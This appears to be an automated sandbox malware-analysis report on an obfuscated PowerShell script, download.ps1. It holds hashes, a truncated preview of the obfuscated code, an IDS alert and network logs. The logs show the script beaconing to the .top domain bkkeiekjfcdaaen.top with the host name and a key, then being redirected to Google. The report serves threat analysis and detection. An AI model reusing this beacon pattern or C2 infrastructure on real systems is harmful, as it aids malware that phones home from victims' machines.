File type:	ASCII text, with very long lines (10691), with CRLF line terminators
Entropy (8bit):	5.997496554054345
TrID:
File name:	download.ps1
File size:	19'500 bytes
MD5:	13850ed56e3bfaf6ef04129944ce5d9d
SHA1:	02a35d9c99f37d249a5f67ea365b59050d7b8643
SHA256:	6876e8571f2ef061a2783259715a5f6c8649df295b0a4828cacd19ca00eff73f
SHA512:	730fa6b4da370dd9da03cb744ae41aa134bcbd9282e8f09537bd4d27eb1f6f4f3147e7fdc614f747a0e677443950e6dab2922b5dccd8b57878b8458619ec79a0
SSDEEP:	384:vRfo8YHwalp5FLjGZa2NI/trGxY/bTyhfhh9B9hflWJn5:vR9YQaD2GEf9hNm
TLSH:	49929EB57B8AFCEA4AD9822F2042AC183E6A55A9D04767C0F3DFD9C97361200DE5CDC1
File Content Preview:	$oldjxpukvg=$executioncontext;$tionesatbebeororentionedtion = -join (0..54 \| ForEach-Object {[char]([int]('0560550600530590570590580580530590510520580550590570590590520570590580550580530590' + '5105805305905205905805205805405705905905905805905305905105705

File Icon


Icon Hash:	3270d6baae77db44

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T15:56:05.143444+0100	2859125	ETPRO MALWARE TA582 Domain in DNS Lookup	1	192.168.2.4	52621	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 15:56:05.825030088 CET	49730	80	192.168.2.4	168.100.10.140
Nov 23, 2024 15:56:05.944650888 CET	80	49730	168.100.10.140	192.168.2.4
Nov 23, 2024 15:56:05.944734097 CET	49730	80	192.168.2.4	168.100.10.140
Nov 23, 2024 15:56:05.948337078 CET	49730	80	192.168.2.4	168.100.10.140
Nov 23, 2024 15:56:06.067836046 CET	80	49730	168.100.10.140	192.168.2.4
Nov 23, 2024 15:56:07.596143961 CET	80	49730	168.100.10.140	192.168.2.4
Nov 23, 2024 15:56:07.649712086 CET	49730	80	192.168.2.4	168.100.10.140
Nov 23, 2024 15:56:07.739341021 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:07.858871937 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:07.858989000 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:07.859152079 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:07.978724957 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687772036 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687796116 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687807083 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687829971 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687839985 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687849998 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687858105 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:09.687864065 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687910080 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:09.687910080 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:09.687972069 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687983036 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.687993050 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.688013077 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:09.688060999 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:09.807454109 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.807466030 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.807552099 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:09.889065981 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.889077902 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.889264107 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:09.928136110 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.928308010 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:09.928381920 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.012422085 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012434006 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012451887 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012461901 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012470961 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012480974 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012485027 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012494087 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012502909 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.012504101 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012514114 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012522936 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012530088 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.012532949 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012545109 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012551069 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.012554884 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012564898 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012577057 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012578964 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.012584925 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012595892 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012603998 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012604952 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.012615919 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.012624979 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.012639999 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.012658119 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.016606092 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.071605921 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.090491056 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.090538025 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.090610027 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.094465971 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.094547987 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.094603062 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.107950926 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.135293007 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.135360003 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.135382891 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.139394045 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.139457941 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.139545918 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.147840023 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.147897959 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.147957087 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.156218052 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.156292915 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.156320095 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.160151005 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.160211086 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.160218954 CET	80	49731	142.250.181.68	192.168.2.4
Nov 23, 2024 15:56:10.212213039 CET	49731	80	192.168.2.4	142.250.181.68
Nov 23, 2024 15:56:10.402616978 CET	49730	80	192.168.2.4	168.100.10.140
Nov 23, 2024 15:56:10.402683020 CET	49731	80	192.168.2.4	142.250.181.68

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 15:56:05.143444061 CET	52621	53	192.168.2.4	1.1.1.1
Nov 23, 2024 15:56:05.813328028 CET	53	52621	1.1.1.1	192.168.2.4
Nov 23, 2024 15:56:07.598248005 CET	64786	53	192.168.2.4	1.1.1.1
Nov 23, 2024 15:56:07.735836983 CET	53	64786	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 23, 2024 15:56:05.143444061 CET	192.168.2.4	1.1.1.1	0x3bd3	Standard query (0)	bkkeiekjfcdaaen.top	A (IP address)	IN (0x0001)	false
Nov 23, 2024 15:56:07.598248005 CET	192.168.2.4	1.1.1.1	0x62d0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 23, 2024 15:56:05.813328028 CET	1.1.1.1	192.168.2.4	0x3bd3	No error (0)	bkkeiekjfcdaaen.top		168.100.10.140	A (IP address)	IN (0x0001)	false
Nov 23, 2024 15:56:07.735836983 CET	1.1.1.1	192.168.2.4	0x62d0	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bkkeiekjfcdaaen.top

www.google.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	168.100.10.140	80	5332	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 15:56:05.948337078 CET	216	OUT	GET /7umlt3rvkyhtr.php?id=user-PC&key=107945053478&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: bkkeiekjfcdaaen.top Connection: Keep-Alive
Nov 23, 2024 15:56:07.596143961 CET	166	IN	HTTP/1.1 302 Found Server: nginx/1.18.0 (Ubuntu) Date: Sat, 23 Nov 2024 14:56:07 GMT Content-Length: 0 Connection: keep-alive Location: http://www.google.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	142.250.181.68	80	5332	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Nov 23, 2024 15:56:07.859152079 CET	159	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Nov 23, 2024 15:56:09.687772036 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:56:09 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-0e7yX8w781yVCpkgM1mRcQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: AEC=AZ6Zc-UuuItAQrue-bhPsa3ZT9DGvPoF8ecy_pWpqpzoUThwXx10aCFkCJU; expires=Thu, 22-May-2025 14:56:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=519=IhdZAWIC3TRVj7ds6UsOReVcjVBVgN_c3ezydzWdkXlxSX8grlBL2PGwH0xb5xIzwg1ly1Xh0jBbjppHITwLKWJfgUDy3cw5YFWqRauv1pqFn_pTe_IpZG-GzQTOudQvQ2VtEjKDgRubmXdFZNHyymROo8N9ftfOCxLbn0de5gWdpZahrT_uCqJ0ULV3boKnDtJ6D487ew; expires=Sun, 25-May-2025 14:56:09 GMT; path=/; domain=.google.com; HttpOnly Accept-Ranges: none Vary: Accept-Encoding Transfer-Encoding: chunked Data Raw: 34 34 34 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 Data Ascii: 444a<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
Nov 23, 2024 15:56:09.687796116 CET	1236	IN	Data Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/
Nov 23, 2024 15:56:09.687807083 CET	1236	IN	Data Raw: 2c 34 36 38 2c 37 2c 31 37 31 2c 33 39 35 32 2c 34 39 2c 33 39 2c 37 32 38 2c 32 36 2c 38 30 39 2c 31 37 38 39 2c 32 32 30 33 2c 31 38 38 2c 31 32 39 2c 31 34 36 33 2c 33 30 31 2c 33 32 31 2c 34 2c 32 2c 36 32 35 2c 31 33 35 2c 34 31 32 2c 33 35 Data Ascii: ,468,7,171,3952,49,39,728,26,809,1789,2203,188,129,1463,301,321,4,2,625,135,412,357,6,2,192,343,2,207,3,291,738,2232,2,1072,369,1,1030,792,2,1398,184,14,1070,122,612,649,110,535,93,664,2506,1380,2003,351,707,417,125,31,378,311,72,468,760,1308,
Nov 23, 2024 15:56:09.687829971 CET	1236	IN	Data Raw: 3a 2f 69 2e 74 65 73 74 28 61 29 26 26 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 22 68 74 74 70 73 3a 22 26 26 28 67 6f 6f 67 6c 65 2e 6d 6c 26 26 67 6f 6f 67 6c 65 2e 6d 6c 28 45 72 72 6f 72 28 22 61 22 29 Data Ascii: :/i.test(a)&&window.location.protocol==="https:"&&(google.ml&&google.ml(Error("a"),!1,{src:a,glmm:1}),a="");return a}function r(a,b,d,c,h){var e="";b.search("&ei=")===-1&&(e="&ei="+n(c),b.search("&lei=")===-1&&(c=p(c))&&(e+="&lei="+c));var f=
Nov 23, 2024 15:56:09.687839985 CET	1236	IN	Data Raw: 28 5b 61 2c 62 5d 29 7d 29 3b 67 6f 6f 67 6c 65 2e 62 78 3d 21 31 3b 76 61 72 20 6b 3b 28 6b 3d 67 6f 6f 67 6c 65 29 2e 6c 78 7c 7c 28 6b 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 3b 76 61 72 20 6c 3d 5b 5d 2c 6d 3b 28 6d 3d 67 6f 6f 67 Data Ascii: ([a,b])});google.bx=!1;var k;(k=google).lx\|\|(k.lx=function(){});var l=[],m;(m=google).fce\|\|(m.fce=function(a,b,c,n){l.push([a,b,c,n])});google.qce=l;}).call(this);google.f={};(function(){document.documentElement.addEventListener("submit",func
Nov 23, 2024 15:56:09.687849998 CET	1236	IN	Data Raw: 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 39 39 30 7d 23 67 62 78 33 7b 6c 65 66 74 3a 30 7d 23 67 62 78 34 7b 72 69 67 68 74 3a 30 7d 23 67 62 62 7b 70 6f 73 69 74 69 Data Ascii: ition:absolute;top:0;width:100%;z-index:990}#gbx3{left:0}#gbx4{right:0}#gbb{position:relative}#gbbw{left:0;position:absolute;top:30px;width:100%}.gbtcb{position:absolute;visibility:hidden}#gbz .gbtcb{right:0}#gbg .gbtcb{left:0}.gbxx{display:no
Nov 23, 2024 15:56:09.687864065 CET	1236	IN	Data Raw: 6f 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 77 69 64 74 68 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 33 70 Data Ascii: ox;display:inline-block;font-size:0;height:0;line-height:0;width:0;border-width:3px 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none;margin:0;padding:0}.gbmc{background:#fff;
Nov 23, 2024 15:56:09.687972069 CET	1236	IN	Data Raw: 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f Data Ascii: ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.g
Nov 23, 2024 15:56:09.687983036 CET	1236	IN	Data Raw: 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f Data Ascii: mportant}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:0 0;display:block;font-size:0;he
Nov 23, 2024 15:56:09.687993050 CET	1236	IN	Data Raw: 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 Data Ascii: nt-weight:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bot
Nov 23, 2024 15:56:09.807454109 CET	1236	IN	Data Raw: 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 65 66 39 64 62 7d 2e 67 62 70 6d 63 20 2e 67 62 70 6d 74 63 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 7d 23 67 62 70 6d 7b 62 6f 72 64 65 72 3a 30 3b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c Data Ascii: mc{background:#fef9db}.gbpmc .gbpmtc{padding:10px 20px}#gbpm{border:0;border-collapse:collapse;border-spacing:0;margin:0;white-space:normal}#gbpm .gbpmtc{border-top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{white-space:now

Target ID:	0
Start time:	09:55:59
Start date:	23/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	09:55:59
Start date:	23/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFD9B7F7BD6 Relevance: .5, Instructions: 467COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27b62f8636a0e38490015fb4b504d5cc84b3ae4efe7e05c390a4526ba4478421
Instruction ID: a507cb3e835d65a3a220725261c9a59b9055d255fd15306e7fc7253a03df68e2
Opcode Fuzzy Hash: 27b62f8636a0e38490015fb4b504d5cc84b3ae4efe7e05c390a4526ba4478421
Instruction Fuzzy Hash: FDF1A630609A4D8FEBA8DF28C8557F93BE1FF54310F54426EE84DC72A5DB3499458B82

Function 00007FFD9B7F8982 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074afc8afa12a703cea3d048a790970ece51e6fe675a448ad5c419da9baf46e7
Instruction ID: ee9e06e6dc952e705f66b85cfa77020f89fe59b0e476eac29f679a8332c928cf
Opcode Fuzzy Hash: 074afc8afa12a703cea3d048a790970ece51e6fe675a448ad5c419da9baf46e7
Instruction Fuzzy Hash: D4E1A330A09A4D8FEBA8DF28C8557E97BE1EF54310F14436AD84DC72A5DB74A9418BC1

Function 00007FFD9BA62E65 Relevance: 2.8, Strings: 1, Instructions: 1520COMMON

Download Yara Rule

Strings

%_L, xrefs: 00007FFD9BA63674

Memory Dump Source

Source File: 00000000.00000002.1861210847.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba60000_powershell.jbxd

Similarity

API ID:
String ID: %_L
API String ID: 0-1469106525
Opcode ID: 97cda6e6859e290d9a3c6034300a0ae9c8ef5fd5d5c5f0cdedc112b2f44eb91b
Instruction ID: 850f4555f5f4074a0627ffaaa05ea61028e19420c7f8520fb9011e2d80ceea48
Opcode Fuzzy Hash: 97cda6e6859e290d9a3c6034300a0ae9c8ef5fd5d5c5f0cdedc112b2f44eb91b
Instruction Fuzzy Hash: BCB204B1B0EA8D8FEBA4DB688865A6877E1EF65304F1900BDD04DC72D3DE65AC46C701

Function 00007FFD9BA63077 Relevance: 2.2, Strings: 1, Instructions: 955COMMON

Download Yara Rule

Strings

%_L, xrefs: 00007FFD9BA63674

Memory Dump Source

Source File: 00000000.00000002.1861210847.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba60000_powershell.jbxd

Similarity

API ID:
String ID: %_L
API String ID: 0-1469106525
Opcode ID: 37097d26bc9904d421faac7973087e0703098611d71a0b13521c4b49b19c4248
Instruction ID: 41026488a8013cd6e6dca6eb4fa60c088aea356a1d808fca768827e68046a518
Opcode Fuzzy Hash: 37097d26bc9904d421faac7973087e0703098611d71a0b13521c4b49b19c4248
Instruction Fuzzy Hash: CA62F271A0DA8D8FEBA9DB2C8865AA877E1EF65304F1500BDD05DC72D3DE69AC42C701

Function 00007FFD9BA92711 Relevance: 2.2, Strings: 1, Instructions: 912COMMON

Download Yara Rule

Strings

s, xrefs: 00007FFD9BA92730

Memory Dump Source

Source File: 00000000.00000002.1861553581.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9ba90000_powershell.jbxd

Similarity

API ID:
String ID: s
API String ID: 0-453955339
Opcode ID: 903b3e2b2a064153cd2a894cafc3ede2186deb36b6dd9397447c27d6f7126352
Instruction ID: a3ca7723680cefcf4bd86fbb3ec0039b77cc24f7111b793cfa842c4485a98d4b
Opcode Fuzzy Hash: 903b3e2b2a064153cd2a894cafc3ede2186deb36b6dd9397447c27d6f7126352
Instruction Fuzzy Hash: 29522822B0EB8D0FE76A9BA858656B57BE1EF96310B0A00FFD05DC71E3D958AD05C341

Function 00007FFD9B7F8596 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8435125eebef0770cb4a1de8ae2cec361c0e19c856b5f6cc4ec9006d12200ddd
Instruction ID: 5e90c5cbc7db730ecba80eeb8c85dc9b4c316cfcc3e530daa06bae7b2b6d8607
Opcode Fuzzy Hash: 8435125eebef0770cb4a1de8ae2cec361c0e19c856b5f6cc4ec9006d12200ddd
Instruction Fuzzy Hash: B3B1B530609B8D8FDB68DF28C8557E93BE1FF55310F14426EE84DC72A5DA3499418B82

Function 00007FFD9B6CE620 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855132300.00007FFD9B6CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b6cd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959e18f7f9bd542eb0acf681d57fea490362b9f4972ab78e66f22e56c9f82b7a
Instruction ID: f8fb115f8b265014e9456056c13444f970f1116bcfc79ed1922900237818d70c
Opcode Fuzzy Hash: 959e18f7f9bd542eb0acf681d57fea490362b9f4972ab78e66f22e56c9f82b7a
Instruction Fuzzy Hash: 8641087140EBC44FE766AB29D8559623FF0EF56220B1505EFD0C8CB1A3D625B846C7A2

Function 00007FFD9B7F21BA Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1855810218.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fe0731573103f721912422dd3b8ecc201dd141543a9bd63ecd0ae2428725bb
Instruction ID: 6c992badbe875888910baa0621a43d5a1d8194bb054c03bd408bf45a8ae28cf2
Opcode Fuzzy Hash: 25fe0731573103f721912422dd3b8ecc201dd141543a9bd63ecd0ae2428725bb
Instruction Fuzzy Hash: 2931C631A1CB8C4FDB18DB5C9C566A97BF0FB99311F00426FE449D32A2DA70A855CBC6

Function 00007FFD9BA92A71 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

